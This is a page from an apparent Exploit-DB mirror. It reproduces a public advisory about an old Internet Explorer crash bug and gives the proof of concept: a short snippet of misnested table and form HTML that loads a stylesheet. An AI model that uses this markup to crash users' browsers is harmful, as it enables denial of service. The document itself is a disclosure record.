exploit-db-mirror/exploits/windows/dos/24135.html
Offensive Security d63de06c7a DB: 2022-11-10
2776 changes to exploits/shellcodes/ghdb
2022-11-10 16:39:50 +00:00

13 lines
No EOL
498 B
HTML

source: https://www.securityfocus.com/bid/10382/info
A vulnerability identified in Internet Explorer may allow an attacker to cause the application to crash. The issue presents itself when the browser attempts to process an HTML page containing a table and loads a css style sheet from a file.
This issue could be exploited by a remote attacker to cause a denial of service condition in the browser.
<table>
<td>
<form class="quick">
<td>
</form>
</table>
<link rel="stylesheet" href="link.css">